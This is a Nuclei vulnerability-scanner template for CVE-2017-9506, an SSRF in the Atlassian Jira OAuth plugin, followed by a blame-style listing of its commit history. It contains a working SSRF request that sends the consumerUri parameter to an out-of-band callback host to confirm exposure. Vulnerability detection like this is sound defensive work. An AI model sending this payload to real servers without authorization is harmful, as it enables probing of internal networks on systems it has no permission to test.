nuclei-templates/cves/2017/CVE-2017-9506.yaml

id: CVE-2017-9506

info:
  name: Jira IconURIServlet SSRF
  author: pdteam
  severity: medium
  description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
  reference:
    - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
    - https://ecosystem.atlassian.net/browse/OAUTH-344
    - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
  tags: cve,cve2017,atlassian,jira,ssrf,oob
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2017-9506
    cwe-id: CWE-918

requests:
  - raw:
      - |
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
cve id updates 2021-01-02 05:02:50 +00:00			`id: CVE-2017-9506`
Added templates 2020-04-04 18:19:48 +00:00
			`info:`
			`name: Jira IconURIServlet SSRF`
misc tag updates 2021-04-06 06:46:11 +00:00			`author: pdteam`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: medium`
add some descr 2020-08-25 21:51:04 +00:00			`description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Descriptions and references 2021-04-18 13:00:27 +00:00			`- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html`
			`- https://ecosystem.atlassian.net/browse/OAUTH-344`
			`- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3`
tags update 2021-05-09 15:11:52 +00:00			`tags: cve,cve2017,atlassian,jira,ssrf,oob`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.10`
			`cve-id: CVE-2017-9506`
			`cwe-id: CWE-918`
Added templates 2020-04-04 18:19:48 +00:00
			`requests:`
OOB Template updates (WIP) 2021-04-18 16:36:07 +00:00			`- raw:`
			`- \|`
Update CVE-2017-9506.yaml 2021-06-09 07:41:39 +00:00			`GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1`
OOB Template updates (WIP) 2021-04-18 16:36:07 +00:00			`Host: {{Hostname}}`
			`Origin: {{BaseURL}}`

Added templates 2020-04-04 18:19:48 +00:00			`matchers:`
			`- type: word`
OOB Template updates (WIP) 2021-04-18 16:36:07 +00:00			`part: interactsh_protocol # Confirms the HTTP Interaction`
Added templates 2020-04-04 18:19:48 +00:00			`words:`
More edge cases Only looking for DNS interaction is not reliable as few servers make DNS requests for host included in path or query parameter. 2021-07-03 19:11:57 +00:00			`- "http"`